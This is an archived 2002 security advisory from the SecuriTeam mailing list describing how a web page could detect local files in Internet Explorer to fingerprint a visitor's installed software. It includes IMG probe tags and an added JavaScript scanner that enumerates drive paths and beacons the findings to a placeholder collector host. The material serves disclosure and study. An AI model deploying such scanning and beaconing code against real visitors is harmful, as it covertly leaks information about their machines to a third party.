[NT] Local File Detection and Installed Software Fingerprinting
From: support@securiteam.com  Date: 04/20/02
From: support@securiteam.com To: list@securiteam.com Date: Sat, 20 Apr 2002 17:56:28 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Local File Detection and Installed Software Fingerprinting
------------------------------------------------------------------------
SUMMARY
A security vulnerability in Internet Explorer (and probably in other
browsers) allows a remote attacker to discover what software is installed
on a visitor's computer by testing for the existence of specific local
files. This can be used to learn sensitive information about the visitor's
machine (for example the install path of Windows, whether Windows Media
Player is installed, or which version of MSN Messenger the user runs).
DETAILS
Vulnerable systems:
This advisory focuses on Windows-based systems and the technique was tested
only on IE 6.0. The same problem probably exists in other browsers and can
probably also be exploited on *NIX-based systems.
Local file detection
It is possible to detect the presence of a given local file when a user
views a web page. How this is done depends on the type of file you want to
detect. Images such as GIF, JPG and BMP files can be detected by loading
them in the page and testing whether the image object's "complete" property
is true: if it is true the file exists, if it is not the file does not exist.
Text files such as TXT, HTM and HTML files can be detected by opening them
in an IFRAME and waiting for the "onLoad" event to fire: if it fires the
file exists; if the file does not exist the event never fires, so absence
has to be inferred from a timeout rather than from a negative event. Another
way to detect such files is to load them as cascading style sheets (and a
bug in IE additionally allows us to read the files' content).
Installed software fingerprinting
If we can detect whether local files exist, we can start fingerprinting
what software is installed on the computer. All we need to know is where
each program installs its files.
For example, Windows installs by default into "\WINDOWS\" or "\WINNT\";
these directories contain files such as "desktop.ini", "folder.htt" and
many background images. To detect whether Windows is installed in one of
the default directories, we can probe for images that are installed by
default, using the following code:
<IMG src="C:\WINDOWS\SETUP.BMP" onLoad="alert('detected in ' + this.src);">
<IMG src="C:\WINNT\Blue Lace 16.bmp" onLoad="alert('detected in ' + this.src);">
<IMG src="D:\WINDOWS\SETUP.BMP" onLoad="alert('detected in ' + this.src);">
<IMG src="D:\WINNT\Blue Lace 16.bmp" onLoad="alert('detected in ' + this.src);">
<IMG src="E:\WINDOWS\SETUP.BMP" onLoad="alert('detected in ' + this.src);">
<IMG src="E:\WINNT\Blue Lace 16.bmp" onLoad="alert('detected in ' + this.src);">
..etc...
<IMG src="Z:\WINDOWS\SETUP.BMP" onLoad="alert('detected in ' + this.src);">
<IMG src="Z:\WINNT\Blue Lace 16.bmp" onLoad="alert('detected in ' + this.src);">
With some additional JavaScript these scans can be fully automated and the
findings reported to a third-party server.
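The following is an added example of such an automated scanner; it is not
part of the original advisory or of the author's demonstration page. It
expands the C:..Z: enumeration written out by hand above, probes each
candidate with the IMG onload/onerror pair (onerror as the negative signal
is an assumption, the advisory only mentions onLoad), probes text files
with the IFRAME onLoad-plus-timeout method, and beacons the hits to a
collector URL. The collector hostname and the "desktop.ini" text probes are
assumptions for illustration; the Image constructor and document object are
passed in as parameters so the logic can be exercised outside a browser.
Modern browsers refuse to load file paths from a remote page, so this only
works in the 2002-era IE the advisory targets.

```javascript
// Added example, not from the advisory. Probe paths for the images come from
// the advisory; the desktop.ini text probes and the collector URL are assumed.
const DRIVES = "CDEFGHIJKLMNOPQRSTUVWXYZ".split("");

// Files the advisory names as present in a default Windows install.
const IMAGE_PROBES = [
  { path: "WINDOWS\\SETUP.BMP", meaning: "Windows in \\WINDOWS" },
  { path: "WINNT\\Blue Lace 16.bmp", meaning: "Windows in \\WINNT" },
];
// Text files for the IFRAME method (assumed: desktop.ini is named in the advisory
// as present in the Windows directory).
const TEXT_PROBES = [
  { path: "WINDOWS\\desktop.ini", meaning: "Windows in \\WINDOWS" },
  { path: "WINNT\\desktop.ini", meaning: "Windows in \\WINNT" },
];

// Expand "C:..Z:" x probe list into concrete local paths to test.
function buildCandidates(drives, probes) {
  const out = [];
  for (const drive of drives) {
    for (const p of probes) {
      out.push({ src: drive + ":\\" + p.path, drive: drive, meaning: p.meaning });
    }
  }
  return out;
}

// IMG probe: onload => file exists, onerror => missing. The timer covers a
// browser that fires neither event for a blocked or unreachable local path.
function probeImage(src, timeoutMs, ImageCtor, cb) {
  let settled = false;
  let timer;
  const finish = (exists) => {
    if (settled) return;
    settled = true;
    clearTimeout(timer);
    cb(exists);
  };
  const img = new ImageCtor();
  img.onload = () => finish(true);
  img.onerror = () => finish(false);
  timer = setTimeout(() => finish(false), timeoutMs);
  img.src = src; // handlers and timer are armed before the load starts
}

// IFRAME probe: only a positive signal (onload) exists, so "missing" is
// inferred when the timeout expires without the event firing.
function probeFrame(src, timeoutMs, doc, cb) {
  let settled = false;
  let timer;
  const frame = doc.createElement("iframe");
  const finish = (exists) => {
    if (settled) return;
    settled = true;
    clearTimeout(timer);
    if (frame.parentNode) frame.parentNode.removeChild(frame);
    cb(exists);
  };
  frame.onload = () => finish(true);
  timer = setTimeout(() => finish(false), timeoutMs);
  frame.src = src;
  doc.body.appendChild(frame);
}

// Run every candidate through probeFn(src, cb) and hand the hits to done().
function scan(candidates, probeFn, done) {
  const found = [];
  let pending = candidates.length;
  if (pending === 0) { done(found); return; }
  candidates.forEach((c) => {
    probeFn(c.src, (exists) => {
      if (exists) found.push(c);
      if (--pending === 0) done(found);
    });
  });
}

// Pack the hits into a query string; loading the URL as an image beacons them
// to the third-party server. The collector host is a hypothetical example.
function buildReportUrl(collector, found) {
  const hits = found.map((f) => f.src).join("|");
  return collector + "?hits=" + encodeURIComponent(hits);
}
function report(url, ImageCtor) {
  const beacon = new ImageCtor();
  beacon.src = url;
}

// Browser usage (hypothetical collector):
//   scan(buildCandidates(DRIVES, IMAGE_PROBES),
//        (s, cb) => probeImage(s, 3000, Image, cb),
//        (found) => report(buildReportUrl("http://collector.example/c", found), Image));
//   scan(buildCandidates(DRIVES, TEXT_PROBES),
//        (s, cb) => probeFrame(s, 3000, document, cb),
//        (found) => report(buildReportUrl("http://collector.example/c", found), Image));
```

Both probe types arm their handlers and the timer before setting `src`, so
a cached or instantly failing load cannot slip past the callback; the
timeout is what turns the onLoad-only IFRAME method into a usable yes/no
test.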
Impact:
Virtually anyone can take advantage of this vulnerability and discover
what software a visiting user has installed.
Demonstration:
A very good demonstration is available at:
<http://spoor12.edup.tudelft.nl/SkyLined/docs/local_file_detecting.html>
ADDITIONAL INFORMATION
The information has been provided by <mailto:SkyLined@edup.tudelft.nl>
Berend-Jan Wever.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.